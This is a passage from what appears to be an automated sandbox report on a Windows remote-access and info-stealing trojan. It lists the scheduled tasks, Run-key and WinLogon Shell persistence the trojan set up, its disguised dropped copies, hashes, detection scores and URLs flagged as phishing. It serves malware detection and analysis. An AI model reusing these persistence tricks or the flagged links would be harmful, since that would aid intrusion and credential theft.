                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:UuIspZT5b6.exe
                          renamed because original name is a hash value
                          Original Sample Name:64483e064aa921f94d5b254601db7c97.exe
                          Detection:MAL
                          Classification:mal100.spre.troj.expl.evad.winEXE@48/64@1/1
                          EGA Information:
                          • Successful, ratio: 16.7%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, schtasks.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target Idle.exe, PID 7916 because it is empty
                          • Execution Graph export aborted for target TyCvtMoTOGrwUAEyotiaCQmKvM.exe, PID 7024 because it is empty
                          • Execution Graph export aborted for target UuIspZT5b6.exe, PID 1888 because it is empty
                          • Execution Graph export aborted for target dllhost.exe, PID 4192 because it is empty
                          • Execution Graph export aborted for target dllhost.exe, PID 6296 because it is empty
                          • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          01:37:16API Interceptor188x Sleep call for process: powershell.exe modified
                          01:37:25API Interceptor3019794x Sleep call for process: dllhost.exe modified
                          06:37:12Task SchedulerRun new task: dllhost path: "C:\Recovery\dllhost.exe"
                          06:37:13Task SchedulerRun new task: dllhostd path: "C:\Recovery\dllhost.exe"
                          06:37:15Task SchedulerRun new task: Idle path: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                          06:37:15Task SchedulerRun new task: IdleI path: "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                          06:37:15Task SchedulerRun new task: TyCvtMoTOGrwUAEyotiaCQmKvM path: "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                          06:37:15Task SchedulerRun new task: TyCvtMoTOGrwUAEyotiaCQmKvMT path: "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                          06:37:16Task SchedulerRun new task: UuIspZT5b6 path: "C:\Users\user\Desktop\UuIspZT5b6.exe"
                          06:37:16Task SchedulerRun new task: UuIspZT5b6U path: "C:\Users\user\Desktop\UuIspZT5b6.exe"
                          06:37:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe"
                          06:37:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvM "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                          06:37:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                          06:37:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6 "C:\Users\user\Desktop\UuIspZT5b6.exe"
                          06:37:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe"
                          06:38:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvM "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                          06:38:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                          06:38:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6 "C:\Users\user\Desktop\UuIspZT5b6.exe"
                          06:38:28AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Recovery\dllhost.exe"
                          06:38:36AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvM "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                          06:38:45AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                          06:38:54AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6 "C:\Users\user\Desktop\UuIspZT5b6.exe"
                          06:39:12AutostartRun: WinLogon Shell "C:\Recovery\dllhost.exe"
                          06:39:21AutostartRun: WinLogon Shell "C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                          06:39:29AutostartRun: WinLogon Shell "C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe"
                          06:39:38AutostartRun: WinLogon Shell "C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                          06:39:47AutostartRun: WinLogon Shell "C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe"
                          06:39:55AutostartRun: WinLogon Shell "C:\Users\user\Desktop\UuIspZT5b6.exe"

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          172.67.203.2http://url7465.zuppler.com/ls/click?upn=sQlCsmQ0KJMo0SI1W6Ioyl-2FoT5ikhqsxBMv3QOfB3cQz6bgLhFEwwzwVns5D-2BKZCxdRWwyvvTy-2FavAiiODklxUak0y99mzPbOModJcptLDU-3D52DK_cVlN2oknvfhsPsL3xOLNHwcPSLZV-2F6CcGIvoq-2Blq9Kuvduy2Hdp-2BVwGAluzbBBAN-2FM9CFwk8hx-2BTCpYNIQZ-2Fufr5PbzN4W6MhzcjMW-2F7-2FTDumaQNi4tfwFmRen4aaQ55x-2FfjfC9kEn3phStQ-2BfzDrt60Qq0e4ROMTRuEnJNy6atR8M2lwtJOVCqxUmTnzinClSUuaWp39iSjlLVgtRWwbw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                            http://url7465.zuppler.com/ls/click?upn=sQlCsmQ0KJMo0SI1W6Ioyl-2FoT5ikhqsxBMv3QOfB3cQz6bgLhFEwwzwVns5D-2BKZCxOfvt0xdhAINWnX5PNw90cSe0K-2FmzjMls-2FqluGBWHUdRFClUmHP605yFE8pZANqqD4YW_m1-2B5T0y9KKTFwH14HcV3J67LqVuSV1XpXHB90F3g6scoy2QVCpXoG7fj2u0NjtWi-2Fc5sYeU44vUxuhdXtxCFCpzh45Wh6Fd-2BnCTSEufLWW1SVxItfmVv-2FVLYcDUUoSwJMnl-2BN36lkj5KiWD7VYSWeIqorNrrpod3WRMG3L38667znI4R51SVPmmjq892AOSoDo-2Ft9IbVjvEMci14Tb1bH4r3IptRfrThKrGeG9NuO6w-3DGet hashmaliciousHTMLPhisherBrowse

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSSecuriteInfo.com.Win32.PWSX-gen.30766.12718.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                              • 188.114.97.3
                              SecuriteInfo.com.Trojan.PackedNET.2944.5818.5375.exeGet hashmaliciousSnake KeyloggerBrowse
                              • 188.114.97.3
                              http://storage.googleapis.com/dfg153erh35ef1gdr/dfgremjflmgr.html#file.html?cbbbbcccXBYFczBrVcdc9kc8cJhS7ckzFcbbbbcGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              zBscRzEOHv.rtfGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                              • 188.114.96.3
                              https://drive.google.com/file/d/1m9FXY_yMaStETtCYX6Nl9hFeKTFaExIX/view?usp=sharing_eil_m&ts=66aa9806Get hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              PmSb2GVtwC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 172.67.159.202
                              8Ck8T5qRcC.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Xmrig, zgRATBrowse
                              • 162.159.136.232
                              #4857395846#.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 104.21.47.110
                              http://eu.docusign.netGet hashmaliciousUnknownBrowse
                              • 1.1.1.1
                              https://eu.docusign.netGet hashmaliciousUnknownBrowse
                              • 104.18.66.57

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\Desktop\CcvWVetw.logh6t9F6kG2d.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                4e9460942b0ebe09cd130b4154587ec6f5f14bbad4b23.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  LisectAVT_2403002A_263.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    U0KN4fzlG7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      pGQ1F8RaiV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        yM80f3LuOQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          l0OB73W8ax.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            475bc80ba1e4ac7b2f40f2a3e1a677a2ccf1ad7f5e5d5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              AK4VPeDc0M.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                a6zbacl43h.exeGet hashmaliciousDCRatBrowse

                                                  Created / dropped Files

                                                  C:\Program Files\Mozilla Firefox\defaults\pref\6ccacd8608530f

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with very long lines (656), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):656
                                                  Entropy (8bit):5.894113455168242
                                                  Encrypted:false
                                                  SSDEEP:12:u7XCs72f1UJmStCRvfp3kVZaNrvk8WfjfLNnBfwdipnhlX+aPJjin:uTja1UY/pUV6cfLpBf7jXFji
                                                  MD5:D4618054A25EB002E3B42A67700D7E7C
                                                  SHA1:FEB3C49C1C86B8B72280F079F4440F3A655F90D9
                                                  SHA-256:8C9CE07F85C0B630820F3D17254A18F939D28E25A57EAEAD9BE51EC134132F23
                                                  SHA-512:66E6FBCFC6363568C7524981B613541E385371C53D12139CA4FBB3CC3F1BEBEBFB038F04D0036E884FB6B66BA081859531C7123B21301E8B3BA1790C788EE040
                                                  Malicious:false
                                                  Preview:ghd3mmahYZomqdu1qhR31XXYJOeB022mZI3z3fEeBExAQSwgY9oyJpxIJFtYHZqfhCNik47Ldw2wkWI1b8m1NDcuUupywqWlXRdNFN6dBdVWwAix716JwzSdjcOzPJYwZQZT34wOBJztsF7UM215tNyi99nm9GO2Fi6flP3CFrHn9ivef4mWRdDMc1U4QKP457oKJbs79yzBFLiaOJGEd1klfuDt59v5cMrC4kVDLpWdnBGQT3pHDKaDWCoYX9CAD4j2efgnyC3yfH7dnwaBTo1Rvnp166pMnVasbNwxXBTARmiPEKvliBrZCSH00or2WrLJrPCZAnnRU19JFZwvKEnmoApIG66tUankbYizIVk4XZELT7ua16rRDjeqj3SDq473NZrq17myesOP6ezJLf1XtVh242QODhNdcK83PEj4T2xUUPtEEJ1LDjK12zw8qYv6fvxwf53H66E1hMipILK3pCZ29GBaRkO5G0zib6iIQuPGfTTpRG0eO2RcV4wZ3czVsIuqX9NLmBm4xTXqwWJLuurOjWMhKJOy44YWimRS3o1MPXpCgGmhTok8bgHAwpBdwy935BIJE0RG2e8MrKBDhreQTa5CfQfNmYabXvGf8cccWeF7h5Tlo86FUtjfFFoxVEeeEhy5EfFE

                                                  C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................................................................0..........(.... ........8........E....)...*.......N...8$...(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{z...9....& ....8y......0..-....... ........8........E....).......j...............8$...8.... ....~....{z...9....& ....8........~....(|...~....(.... ....?g... ....~....{....:....& ....8y...~....9.... ....~....{o...9[...& ....8P......... ........88...r...ps....

                                                  C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Recovery\5940a34987c991

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):59
                                                  Entropy (8bit):4.9034152949412055
                                                  Encrypted:false
                                                  SSDEEP:3:altDUrnkB2dGn:atIrkB6Gn
                                                  MD5:97A57B12DA8A3AA5C6C73F131CDE11DC
                                                  SHA1:72F9A13F92CDFBCB5C1D3F68481F8E9439A079F7
                                                  SHA-256:8506EB4015E0FD5779D0B6934C1BA7FA203783EC7615B954CCEBCDA4F064DFAE
                                                  SHA-512:992A45EBCEC40F517C093029F1A6DBE8A9728AC7B27E22D4EFC5E9E6AFDFDAF2ED2B59905245087299ADE8945518B9F8397FEA77C56C7165D144B5ABC7C15202
                                                  Malicious:false
                                                  Preview:eZj0pH1P4Ij6TgfoVXUM1AeMLfq22ZoyFSsDA1KTeYKF0H2YExjKyALe4Wp

                                                  C:\Recovery\dllhost.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................................................................0..........(.... ........8........E....)...*.......N...8$...(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{z...9....& ....8y......0..-....... ........8........E....).......j...............8$...8.... ....~....{z...9....& ....8........~....(|...~....(.... ....?g... ....~....{....:....& ....8y...~....9.... ....~....{o...9[...& ....8P......... ........88...r...ps....

                                                  C:\Recovery\dllhost.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\Public\Downloads\4821a341fd9e2f

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with very long lines (951), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):951
                                                  Entropy (8bit):5.891785453819785
                                                  Encrypted:false
                                                  SSDEEP:24:GG5T/Jx2rbYdNySbMEmTip77mUEqyJDxkU9LfOU:GGxncYdOK7CUNk
                                                  MD5:D8C5419F9FE2598A5A5761B19370F241
                                                  SHA1:F249BE416BF2082F8D898E128B16FD4187DD8DC8
                                                  SHA-256:871CE8D3E0FC2F98805A120EB38D58081BB73AA4322298EF40C8B88BB0B88BD4
                                                  SHA-512:55BE5E0D570F1057215617A35BB181A1DA0A8CDD88720E4E1AA238AE5B53700019DD9AD3DC21D7E0B22E78F5BBA986C608C3157019321719919BDFF6FB83E60A
                                                  Malicious:false
                                                  Preview:CtU7Jd48yAuHbDkCkmY4R54XX3Ly1oqkGkTivnc6H4hx3g18xr6OB5pHy7kQSGGKTKA1tBR7KbxWYGd0BMBKrbiL4MtyDMnAxWdtfAOvZ9EkHTsrdtOGF6d1lz6gRd38yxiBntVB7PurX8DkeBUT7h413mIpDse5FGvUurEuYMI0LvenwVCPJkAQ2rHBlp8PvzlRMs0w7j5vYEpIHe3rpOvfFfcCjDJtO3FWJNbDfQSkpO2xC93GvRkgDGLrQxM3ZMhf9S94DzLY5L01moAkKD76SiSDBuxsDZKdrXyu98C5FLk2PUElwmsWOkMa952TCdVgBXJP0QkMAB1H8axrpM5bqxOHKXuEFt3l0D01KyugBgWMtEciILn0i40NJCEcfgGQIPR4j5h0bYZJaBYF5L54FCD6NnsItRAeaFEdxi8MnxYJerwHo9hUkLLFLUr6MYHJY5sV74RXMtQSn4bg0ldutq3O48Rc0C9PpPui8bKtrKH142bR2KGl4WZsBda8mygKtBmYJ3hYauDjiCUBgAkq5XUTzCheBMH2o6H3QCH9mrLKT0J9JZblO0OVrSjGVDXOmL5l4avd3kDOMJA83hUmufnxsvM7dAojU6hH5hEtn8soxAJhSkNxtveHhH3IOxA26d3Ql2DWdl8wx8Armop2x00jcakxn6ez7zsTH25Zh0UIwrTiGLfjIIFFnTxLSQsgGIy8QrkutPV6frxuHCrba4rztmpxEuHRIxBo3URYkv03wIk5gDDQiQGLb9OnCxp8HEyrqI1wuS0oExClCtQBq1s1rzM3GoWxG1vsU2PXMQfQZbHn6nlShnRQV6A167qG5DhMCTQJe2zZVbbQrj6dCEQcjfXX2YbOkZUW35lnWbyoy243euJWAMD1xFmg62RGaky5HFWw8TGlPlorld2IOFOXWcjySEreKsNOD8wZXXYqGclLa45

                                                  C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................................................................0..........(.... ........8........E....)...*.......N...8$...(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{z...9....& ....8y......0..-....... ........8........E....).......j...............8$...8.... ....~....{z...9....& ....8........~....(|...~....(.... ....?g... ....~....{....:....& ....8y...~....9.... ....~....{o...9[...& ....8P......... ........88...r...ps....

                                                  C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Idle.exe.log

                                                  Download File
                                                  Process:C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.354334472896228
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TyCvtMoTOGrwUAEyotiaCQmKvM.exe.log

                                                  Download File
                                                  Process:C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.354334472896228
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UuIspZT5b6.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:CSV text
